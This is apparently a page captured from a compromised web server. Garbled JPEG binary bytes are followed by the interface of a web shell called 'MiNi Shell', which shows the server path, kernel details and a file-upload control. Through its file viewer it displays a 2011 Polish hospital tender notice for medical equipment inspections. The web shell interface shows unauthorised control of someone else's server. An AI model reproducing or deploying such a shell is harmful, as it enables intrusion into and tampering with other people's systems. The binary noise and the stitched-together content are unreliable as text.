JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110228/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110228/66875-N-2011.html

<p class="kh_header"><b>Łódź: Nr sprawy: PN/16/ZP/U/2011. Przegląd sprzętu medycznego</b><br>
<b>Numer ogłoszenia: 66875 - 2011; data zamieszczenia: 28.02.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> SPZOZ Uniwersytecki Szpital Kliniczny Nr 2 im. WAM Uniwersytetu Medycznego w Łodzi - Centralny Szpital Weteranów , ul. Żeromskiego 113, 90-549 Łódź, woj. łódzkie, tel. 042 6393452, 6393453, 6393458, faks 042 6393452.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.usk.umed.lodz.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Nr sprawy: PN/16/ZP/U/2011. Przegląd sprzętu medycznego.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiotem umowy jest usługa przeglądu sprzętu medycznego zwanego dalej sprzętem określonego rodzajowo i pogrupowanego w 75 częściach zwanych pakietami w załącznik nr 2.1 do SIWZ oraz poniżej:

Nr pakietu/Aparatura medyczna/Producent/Liczba przeglądów [szt.]---
-----PLACÓWKA PRZY ULICY STERLIGA 1/3 -----
1./Aparat do jodochwytności/Biodex Medical Systems/1 szt.---
2./Aparat do kontrapulsacji wewnątrzaortalnej/Datascope/5 szt.---
3./Aparat do terapii nerkozastępczej (hemodializ) / Gambro Poland Sp. z o.o. /1 szt.---
4./Aparat do znieczulania ogólnego/GE Datex-Ohmeda/1 szt.---
5./Aparat do znieczulania ogólnego/ Drager Polska sp. Z o.o. /1 szt.---
6./Aparat RTG /Siemens/3 szt.---
7./Aparat RTG TX-32-HF-B przewoźny/Radiologia s.a. Algete Madrit/1 szt.---
8./Aparat RTG ZIEHM VISION R zabiegowy Ramię C/ZIEHM Imaging/1 szt.---
9./Biopompa z panelem sterowniczym/Jostra (Maquet)/1 szt.---
10./Centrala monitorująca + kardiomonitory 13 szt./AxMediTec sp. Z o.o./1 szt.---
11./Defibrylator/S&W/7 szt.---
12./Defibrylator/Medtronic Poland Sp.z.o.o. /13 szt.---
13./Defibrylator/MRL/1 szt.---
14./Densytometr/General Electric Healhcare Lunar/1 szt.---
15./Diatermia chirurgiczna/Martin/1 szt.---
16./Diatermia chirurgiczna/Erbe/2 szt.---
17./Diatermia chirurgiczna/Valleylab/2 szt.---
18./Echokardiograf/Siemens/1 szt.---
19./Echokardiograf/Philips Polska sp. Z o.o./1 szt.---
20./Elektrokardiograf EKG/Schiller/1 szt.---
21./Elektrokardiograf EKG/Aspel/1 szt.---
22./Elektrokardiograf EKG/Aspel/1 szt.---
23./Elektrokardiograf EKG/BTL Polska/4 szt.---
24./Elektrokardiograf EKG/Hellige/1 szt.---
25./Elektrokardiograf EKG/Medea/2 szt.---
26./Elektrokardiograf EKG/Cardio Line/1 szt.---
27./Elektrokardiograf EKG/Farum SA/9 szt.---
28./Hemooxymetr/Radiometer/1 szt.---
29./Hiterculer STOCKERT/Stockert/1 szt.---
30./Kardiomonitor/S&W/7 szt.---
31./Kardiomonitor/Biazet/12 szt.---
32./Kardiomonitor/S&W/1 szt.---
33./Kardiomonitor/Mindray/14 szt.---
34./Kardiomonitor/SPACE LABS /9 szt.---
35./Kardiomonitor/Mindray/4 szt.---
36./Kardiomonitor/Welch Allyn/1 szt.---
37./Kardiomonitor PM 6000 z modułami (Zestaw śródoperacyjnego nadzoru)/Mindray/2 szt.---
38./Kardiostymulator /Biotronik/1 szt.---
39./Kardiostymulator /Tesla/1 szt.---
40./Kardiostymulator /Instytut Techniki i Aparatury Medycznej ITAM/6 szt.---
41./Mammograf/Elscint/1 szt.---
42./Miernik skażeń powierzchni/Polon-Polska/2 szt.---
43./Radioanalizer Xpress/ MDS Medical Diagnostic Systems sp. Z o.o. /1 szt.---
44./Respirator/Ambu/2 szt.---
45./Respirator/Bear Medical System/1 szt.---
46./Respirator/Nellcor Puritan/13 szt.---
47./Respirator/Draeger Medical/1 szt.---

2.Formularz cenowy oferty Wykonawcy stanowi załącznik nr 2.2 do SIWZ.
3.Wykonawca w ramach Usługi wykona czynności przeglądowe, w szczególności polegające na:
3.1.dokonaniu oględzin sprzętu,
3.2.sprawdzeniu działania sprzętu,
3.3.wykonaniu regulacji i pomiarów kontrolnych,
3.4.wykonaniu testów (jeśli są wymagane przez producenta),
3.5.wystawieniu raport przeglądowego (serwisowego),
3.6.dokonaniu w dokumentacji eksploatacji (Paszporcie) wpisu dopuszczającego bądź niedopuszczającego do użytkowania sprzętu.
3.7.wystawieniu orzeczeń technicznych o stanie technicznym sprzętu w przypadku dopuszczenia warunkowego bądź niedopuszczenia do użytkowania sprzętu.
4.W przypadku niedopuszczenia bądź warunkowego dopuszczenia sprzętu do użytkowania poza czynnościami określonymi w pkt.3, Wykonawca przedstawi /Kosztorys/ usunięcia usterki wraz z wyszczególnieniem koniecznych do wymiany elementów.
5.Wykonawca dostarczy Kosztorys, o którym mowa w pkt.4 oraz orzeczenie techniczne, o którym mowa w pkt.3.7, w terminie maksymalnie 3 dni roboczych od wystawienia raportu przeglądowego i dokonaniu wpisu do Paszportu.
6.Zamawiający przewiduje możliwość zmniejszenia ilości przeglądów w stosunku do określonych w załączniku nr 1 do Umowy w przypadku wyłączenia przez Zamawiającego z eksploatacji sprzętu. W takim przypadku Zamawiający przed wykonaniem Usługi powiadomi pisemnie Wykonawcę o wyłączeniu z eksploatacji. 
7.Wykonawcy nie przysługuje wynagrodzenie za niewykonane przeglądy, o których mowa w pkt. 6.
8.Wykonawca zobowiązuje się do wykonania Usługi będącej przedmiotem niniejszej umowy, zgodnie z aktualnym poziomem wiedzy technicznej i należytą starannością oraz zgodnie z obowiązującymi przepisami prawa w tym zakresie.
9.Zamawiający wymaga wykonania usługi przez osoby posiadające kwalifikacje i stosowne przeszkolenie w zakresie serwisowania i użytkowania elektrycznych urządzeń medycznych, a w pakietach o numerach: 1-19, 28-29, 37-47, 52-57, 61-63, 65-75 dodatkowo wymaga wykonania usługi przez osobę lub firmę posiadającą autoryzację producenta w zakresie serwisowania wydane przez producenta danego sprzętu..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 50.42.00.00-5.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 75.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 28.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie wymagane</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>dotyczy wszystkich pakietów: 
Wymagane jest, aby Wykonawca należycie wykonał, a w przypadku świadczeń okresowych lub ciągłych również wykonywał, co najmniej trzy usługi polegające na wykonaniu przeglądów technicznych aparatury medycznej zgodnej z tą na którą Wykonawca składa ofertę, w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>dotyczy pakietów o numerach: 1-19, 28-29, 37-47, 52-57, 61-63, 65-75 :
Wymagane jest, aby Wykonawca dysponował odpowiednim potencjałem technicznym oraz przynajmniej jedną osobą zdolną do wykonania zamówienia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Dokładne informacje o oświadczeniach i dokumentach jakie powinni dostarczyć Wykonawcy w celu potwierdzenia spełnienia warunków udziału w postepowaniu 
opisane są w pkt. V. SIWZ
1.	Na ofertę składają się następujące dokumenty:
1.1.	/Formularz Oferty/ przygotowany zgodnie ze wzorem podanym w Załączniku nr 1 do SIWZ - w oryginale.
1.2.	/Formularz Cenowy/ przygotowany zgodnie ze wzorem podanym w Załączniku nr 2.2 do SIWZ - w oryginale.
1.3.	Oświadczenia i dokumenty wskazane w punkcie V SIWZ:
a)	oświadczenie o spełnianiu warunków udziału w postępowaniu, stanowiące załącznik nr 3.1 do SIWZ - w oryginale,
b)	oświadczenie o braku podstaw do wykluczenia, stanowiące załącznik nr 3.2 do SIWZ - w oryginale,
c)	aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert - kserokopia potwierdzona przez Wykonawcę za zgodność z oryginałem - w oryginale,
d)	dotyczy pakietów o numerach: 1-19, 28-29, 37-47, 52-57, 61-63, 65-75:
1)	oświadczenie, o których mowa w pkt. V.1.2.2) - według załącznika nr 3.3 do SIWZ
2)	wykaz osób w zakresie warunku dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia, o których mowa w pkt. V.1.2.2) - według załącznika nr 5.1 do SIWZ. 
e)	dotyczy pakietów o numerach: 20-27, 30-36, 48-51, 58-60, 64: 
1)	wykaz wykonanych usług w zakresie warunku posiadania wiedzy i doświadczenia, o których mowa w pkt. V.1.3.1) - według załącznika nr 5.2 do SIWZ, 
2)	dokumenty potwierdzające należyte wykonanie usług z wykazu, o którym mowa w ppkt.1), np. referencje.
1.4.	Pełnomocnictwo do podpisania oferty, oświadczeń i dokumentów składających się na ofertę, o ile upoważnienie to nie wynika z innych dokumentów dołączonych do oferty - w oryginale lub kopii potwierdzonej notarialnie.
1.5.	W przypadku oferty składanej przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia (np. konsorcjum, spółka cywilna), do oferty powinno zostać załączone pełnomocnictwo dla Osoby Uprawnionej do reprezentowania ich w postępowaniu albo do reprezentowania ich w postępowaniu i zawarcia umowy) - w oryginale lub kopii potwierdzonej notarialnie.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Strony przewidują możliwość zmiany terminu wykonania umowy w wyjątkowych sytuacjach, których nie można było przewidzieć w chwili zawarcia umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.usk.umed.lodz.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> SPZOZ Uniwersytecki Szpital Kliniczny im. WAM Uniwersytetu Medycznego w Łodzi - Centralny Szpital Weteranów, ul. Żeromskiego 113, 90 - 549 Łódź,.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 08.03.2011 godzina 10:00, miejsce: SPZOZ Uniwersytecki Szpital Kliniczny im. WAM Uniwersytetu Medycznego w Łodzi - CSW, ul. Żeromskiego 113, 90 - 549 Łódź - kancelaria ogólna Szpitala - w godz. od 8:00 do 15:00.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com